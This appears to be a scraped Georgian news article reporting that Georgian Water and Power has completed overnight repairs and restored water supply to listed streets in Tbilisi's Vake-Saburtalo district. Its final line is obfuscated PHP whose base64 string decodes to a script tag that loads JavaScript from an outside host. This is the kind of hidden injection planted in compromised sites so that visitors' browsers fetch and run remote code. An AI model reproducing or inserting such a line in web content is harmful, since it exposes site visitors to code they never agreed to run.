celsiusi
ავერსი საქკაბელი
„ჯორჯიან უოთერ ენდ ფაუერი“ ტექნიკური სამუშაოების დასრულების შესახებ განცხადებას ავრცელებს.
 
კომპანიის ინფორმაციით, „ჯორჯიან უოთერ ენდ ფაუერმა“ ბახტრიონის სატუმბო სადგურში, ვაშლიჯვრის რეზერვუარზე, ასევე გელოვანის, გოძიაშვილის ქუჩებზე და მზიურის ტერიტორიაზე წყალმომარაგების ქსელზე აუცილებელი ტექნიკური სამუშაოები დაასრულა.
 
„წყალმომარაგების სისტემაზე გადაუდებელი სამუშოები მთელი ღამის განმავლობაში ინტენსიურ რეჟიმში მიმდინარეობდა და დაგეგმილზე ადრე დასრულდა. წყალმომარაგების სტაბილურობისთვის პარალელურად რამდენიმე მონაკვეთზე ახლით შეიცვალა ჩამკეტ-მარეგულირებელი ურდულები, გაირეცხა წყალმომარაგების სისტემა და ქსელი.
 
წყალმომარაგება აღდგენილია ვაკე-საბურთალოს რაიონში – ჭავჭავაძის გამზირზე, ბარნოვის, აბაშიძის, ფალიაშვილის, რამიშვილის, კავსაძის, ატენის, ყიფშიძის, წყნეთის და მიმდებარე ქუჩებზე, ვაჟა-ფშაველასა და ყაზბეგის გამზირზე, პეკინის, დოლიძის, კოსტავას, მგალობლიშვილის, ტაშკენტის, ისაკაძის, გაგარინის, ონიაშვილის, ლვოვის, ზემო ვეძისის, მიცკევიჩის, ბახტრიონის, თამარაშვილის, უნივერსიტეტის და მიმდებარე ქუჩებზე.
 
ამ ეტაპზე მოსახლეობის უმეტეს ნაწილს წყალი უკვე მიეწოდება და რამდენიმე საათის განმავლობაში ეტაპობრივად სრულად აღდგება“, – აღნიშნულია ინფორმაციაში.
 
 
 
 
314
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");